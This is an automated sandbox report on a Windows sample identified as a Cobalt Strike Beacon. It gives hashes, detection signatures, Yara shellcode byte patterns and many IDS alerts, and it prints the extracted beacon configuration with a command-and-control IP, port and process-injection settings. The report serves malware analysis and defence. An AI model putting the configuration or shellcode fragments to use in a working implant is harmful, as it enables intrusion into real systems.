Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12.exe

Overview

General Information

Sample name:12.exe
Analysis ID:1581039
MD5:c8c40c038a4a8541e0924520599d8c28
SHA1:295bb62eaf5f53f55d60f2f339a45cd7cd7aa82c
SHA256:cbc52ae56076b1e28cff760b662145425620ae4b6d400cc9446deec21d1aae4a
Tags:CobaltStrikeexeuser-sicehicetf
Infos:

Detection

CobaltStrike, ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
Yara detected ReflectiveLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 12.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\12.exe" MD5: C8C40C038A4A8541E0924520599D8C28)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTP"], "Port": 59060, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "152.42.226.16,/cx", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
12.exeJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x8f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0xfb:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          Click to see the 33 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.12.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
            0.0.12.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
              0.2.12.exe.db0000.2.raw.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                0.2.12.exe.db0000.2.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
                  0.2.12.exe.db0000.2.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                    Click to see the 53 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-26T19:28:01.174082+010020337131Targeted Malicious Activity was Detected192.168.2.449730152.42.226.1659060TCP
                    2024-12-26T19:28:04.065607+010020337131Targeted Malicious Activity was Detected192.168.2.449731152.42.226.1659060TCP
                    2024-12-26T19:28:07.008994+010020337131Targeted Malicious Activity was Detected192.168.2.449732152.42.226.1659060TCP
                    2024-12-26T19:28:09.938290+010020337131Targeted Malicious Activity was Detected192.168.2.449733152.42.226.1659060TCP
                    2024-12-26T19:28:13.024487+010020337131Targeted Malicious Activity was Detected192.168.2.449734152.42.226.1659060TCP
                    2024-12-26T19:28:15.921977+010020337131Targeted Malicious Activity was Detected192.168.2.449735152.42.226.1659060TCP
                    2024-12-26T19:28:18.852713+010020337131Targeted Malicious Activity was Detected192.168.2.449737152.42.226.1659060TCP
                    2024-12-26T19:28:21.863365+010020337131Targeted Malicious Activity was Detected192.168.2.449741152.42.226.1659060TCP
                    2024-12-26T19:28:24.767420+010020337131Targeted Malicious Activity was Detected192.168.2.449743152.42.226.1659060TCP
                    2024-12-26T19:28:27.658629+010020337131Targeted Malicious Activity was Detected192.168.2.449745152.42.226.1659060TCP
                    2024-12-26T19:28:30.587201+010020337131Targeted Malicious Activity was Detected192.168.2.449746152.42.226.1659060TCP
                    2024-12-26T19:28:33.469999+010020337131Targeted Malicious Activity was Detected192.168.2.449747152.42.226.1659060TCP
                    2024-12-26T19:28:36.381095+010020337131Targeted Malicious Activity was Detected192.168.2.449748152.42.226.1659060TCP
                    2024-12-26T19:28:39.298766+010020337131Targeted Malicious Activity was Detected192.168.2.449749152.42.226.1659060TCP
                    2024-12-26T19:28:42.220886+010020337131Targeted Malicious Activity was Detected192.168.2.449750152.42.226.1659060TCP
                    2024-12-26T19:28:45.126842+010020337131Targeted Malicious Activity was Detected192.168.2.449751152.42.226.1659060TCP
                    2024-12-26T19:28:48.127398+010020337131Targeted Malicious Activity was Detected192.168.2.449752152.42.226.1659060TCP
                    2024-12-26T19:28:51.077524+010020337131Targeted Malicious Activity was Detected192.168.2.449753152.42.226.1659060TCP
                    2024-12-26T19:28:53.995484+010020337131Targeted Malicious Activity was Detected192.168.2.449754152.42.226.1659060TCP
                    2024-12-26T19:28:56.948292+010020337131Targeted Malicious Activity was Detected192.168.2.449755152.42.226.1659060TCP
                    2024-12-26T19:28:59.893821+010020337131Targeted Malicious Activity was Detected192.168.2.449758152.42.226.1659060TCP
                    2024-12-26T19:29:02.785028+010020337131Targeted Malicious Activity was Detected192.168.2.449764152.42.226.1659060TCP
                    2024-12-26T19:29:05.752619+010020337131Targeted Malicious Activity was Detected192.168.2.449770152.42.226.1659060TCP
                    2024-12-26T19:29:08.643492+010020337131Targeted Malicious Activity was Detected192.168.2.449776152.42.226.1659060TCP
                    2024-12-26T19:29:11.534105+010020337131Targeted Malicious Activity was Detected192.168.2.449782152.42.226.1659060TCP
                    2024-12-26T19:29:14.424353+010020337131Targeted Malicious Activity was Detected192.168.2.449788152.42.226.1659060TCP
                    2024-12-26T19:29:17.315337+010020337131Targeted Malicious Activity was Detected192.168.2.449794152.42.226.1659060TCP
                    2024-12-26T19:29:20.206541+010020337131Targeted Malicious Activity was Detected192.168.2.449805152.42.226.1659060TCP
                    2024-12-26T19:29:23.112154+010020337131Targeted Malicious Activity was Detected192.168.2.449811152.42.226.1659060TCP
                    2024-12-26T19:29:26.230193+010020337131Targeted Malicious Activity was Detected192.168.2.449817152.42.226.1659060TCP
                    2024-12-26T19:29:29.189460+010020337131Targeted Malicious Activity was Detected192.168.2.449823152.42.226.1659060TCP
                    2024-12-26T19:29:32.105461+010020337131Targeted Malicious Activity was Detected192.168.2.449829152.42.226.1659060TCP
                    2024-12-26T19:29:35.046126+010020337131Targeted Malicious Activity was Detected192.168.2.449839152.42.226.1659060TCP
                    2024-12-26T19:29:37.940700+010020337131Targeted Malicious Activity was Detected192.168.2.449846152.42.226.1659060TCP
                    2024-12-26T19:29:40.833437+010020337131Targeted Malicious Activity was Detected192.168.2.449852152.42.226.1659060TCP
                    2024-12-26T19:29:43.731451+010020337131Targeted Malicious Activity was Detected192.168.2.449858152.42.226.1659060TCP
                    2024-12-26T19:29:46.671469+010020337131Targeted Malicious Activity was Detected192.168.2.449869152.42.226.1659060TCP
                    2024-12-26T19:29:49.566010+010020337131Targeted Malicious Activity was Detected192.168.2.449875152.42.226.1659060TCP
                    2024-12-26T19:29:52.473411+010020337131Targeted Malicious Activity was Detected192.168.2.449881152.42.226.1659060TCP
                    2024-12-26T19:29:55.539263+010020337131Targeted Malicious Activity was Detected192.168.2.449887152.42.226.1659060TCP
                    2024-12-26T19:29:58.426729+010020337131Targeted Malicious Activity was Detected192.168.2.449896152.42.226.1659060TCP
                    2024-12-26T19:30:01.355750+010020337131Targeted Malicious Activity was Detected192.168.2.449904152.42.226.1659060TCP
                    2024-12-26T19:30:04.261831+010020337131Targeted Malicious Activity was Detected192.168.2.449910152.42.226.1659060TCP
                    2024-12-26T19:30:07.144332+010020337131Targeted Malicious Activity was Detected192.168.2.449916152.42.226.1659060TCP
                    2024-12-26T19:30:10.036173+010020337131Targeted Malicious Activity was Detected192.168.2.449925152.42.226.1659060TCP
                    2024-12-26T19:30:12.925060+010020337131Targeted Malicious Activity was Detected192.168.2.449933152.42.226.1659060TCP
                    2024-12-26T19:30:16.035600+010020337131Targeted Malicious Activity was Detected192.168.2.449939152.42.226.1659060TCP
                    2024-12-26T19:30:18.931747+010020337131Targeted Malicious Activity was Detected192.168.2.449945152.42.226.1659060TCP
                    2024-12-26T19:30:21.832539+010020337131Targeted Malicious Activity was Detected192.168.2.449954152.42.226.1659060TCP
                    2024-12-26T19:30:24.725469+010020337131Targeted Malicious Activity was Detected192.168.2.449962152.42.226.1659060TCP
                    2024-12-26T19:30:27.613095+010020337131Targeted Malicious Activity was Detected192.168.2.449968152.42.226.1659060TCP
                    2024-12-26T19:30:30.503531+010020337131Targeted Malicious Activity was Detected192.168.2.449973152.42.226.1659060TCP
                    2024-12-26T19:30:33.410620+010020337131Targeted Malicious Activity was Detected192.168.2.449978152.42.226.1659060TCP
                    2024-12-26T19:30:36.319540+010020337131Targeted Malicious Activity was Detected192.168.2.449987152.42.226.1659060TCP
                    2024-12-26T19:30:39.298482+010020337131Targeted Malicious Activity was Detected192.168.2.449994152.42.226.1659060TCP
                    2024-12-26T19:30:42.223934+010020337131Targeted Malicious Activity was Detected192.168.2.450000152.42.226.1659060TCP
                    2024-12-26T19:30:45.113944+010020337131Targeted Malicious Activity was Detected192.168.2.450009152.42.226.1659060TCP
                    2024-12-26T19:30:48.020191+010020337131Targeted Malicious Activity was Detected192.168.2.450016152.42.226.1659060TCP
                    2024-12-26T19:30:50.913584+010020337131Targeted Malicious Activity was Detected192.168.2.450022152.42.226.1659060TCP
                    2024-12-26T19:30:53.801887+010020337131Targeted Malicious Activity was Detected192.168.2.450029152.42.226.1659060TCP
                    2024-12-26T19:30:56.737650+010020337131Targeted Malicious Activity was Detected192.168.2.450036152.42.226.1659060TCP
                    2024-12-26T19:30:59.629939+010020337131Targeted Malicious Activity was Detected192.168.2.450045152.42.226.1659060TCP
                    2024-12-26T19:31:02.519995+010020337131Targeted Malicious Activity was Detected192.168.2.450050152.42.226.1659060TCP
                    2024-12-26T19:31:05.411871+010020337131Targeted Malicious Activity was Detected192.168.2.450056152.42.226.1659060TCP
                    2024-12-26T19:31:08.305535+010020337131Targeted Malicious Activity was Detected192.168.2.450063152.42.226.1659060TCP
                    2024-12-26T19:31:11.209608+010020337131Targeted Malicious Activity was Detected192.168.2.450067152.42.226.1659060TCP
                    2024-12-26T19:31:14.098124+010020337131Targeted Malicious Activity was Detected192.168.2.450068152.42.226.1659060TCP
                    2024-12-26T19:31:16.988917+010020337131Targeted Malicious Activity was Detected192.168.2.450069152.42.226.1659060TCP
                    2024-12-26T19:31:19.896222+010020337131Targeted Malicious Activity was Detected192.168.2.450070152.42.226.1659060TCP
                    2024-12-26T19:31:22.845151+010020337131Targeted Malicious Activity was Detected192.168.2.450071152.42.226.1659060TCP
                    2024-12-26T19:31:25.755345+010020337131Targeted Malicious Activity was Detected192.168.2.450072152.42.226.1659060TCP
                    2024-12-26T19:31:28.660857+010020337131Targeted Malicious Activity was Detected192.168.2.450073152.42.226.1659060TCP
                    2024-12-26T19:31:31.559825+010020337131Targeted Malicious Activity was Detected192.168.2.450074152.42.226.1659060TCP
                    2024-12-26T19:31:34.521650+010020337131Targeted Malicious Activity was Detected192.168.2.450075152.42.226.1659060TCP
                    2024-12-26T19:31:37.583462+010020337131Targeted Malicious Activity was Detected192.168.2.450076152.42.226.1659060TCP
                    2024-12-26T19:31:40.475090+010020337131Targeted Malicious Activity was Detected192.168.2.450077152.42.226.1659060TCP
                    2024-12-26T19:31:43.731887+010020337131Targeted Malicious Activity was Detected192.168.2.450078152.42.226.1659060TCP
                    2024-12-26T19:31:46.633605+010020337131Targeted Malicious Activity was Detected192.168.2.450079152.42.226.1659060TCP
                    2024-12-26T19:31:49.520544+010020337131Targeted Malicious Activity was Detected192.168.2.450080152.42.226.1659060TCP
                    2024-12-26T19:31:52.413722+010020337131Targeted Malicious Activity was Detected192.168.2.450081152.42.226.1659060TCP
                    2024-12-26T19:31:55.302479+010020337131Targeted Malicious Activity was Detected192.168.2.450082152.42.226.1659060TCP
                    2024-12-26T19:31:58.236196+010020337131Targeted Malicious Activity was Detected192.168.2.450083152.42.226.1659060TCP
                    2024-12-26T19:32:01.240049+010020337131Targeted Malicious Activity was Detected192.168.2.450084152.42.226.1659060TCP
                    2024-12-26T19:32:04.130504+010020337131Targeted Malicious Activity was Detected192.168.2.450085152.42.226.1659060TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: 12.exeAvira: detected
                    Found malware configuration
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 59060, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "152.42.226.16,/cx", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
                    Multi AV Scanner detection for submitted file
                    Source: 12.exeReversingLabs: Detection: 94%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: 12.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBEF82 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00DBEF82
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBEF82 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00DBEF82
                    Source: 12.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00DBA70E
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB5225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00DB5225
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DBA70E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_00DBA70E

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49743 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49745 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49741 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49746 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49748 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49770 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49776 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49782 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49788 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49794 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49805 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49811 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49817 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49823 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49829 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49839 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49846 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49852 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49858 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49869 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49881 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49887 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49904 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49875 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49916 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49896 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49925 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49933 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49939 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49910 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49945 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49954 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49962 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49968 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49973 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49978 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49987 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49994 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50000 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50009 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50029 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50022 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50036 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50050 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50063 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50069 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50067 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50070 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50071 -> 152.42.226.16:59060
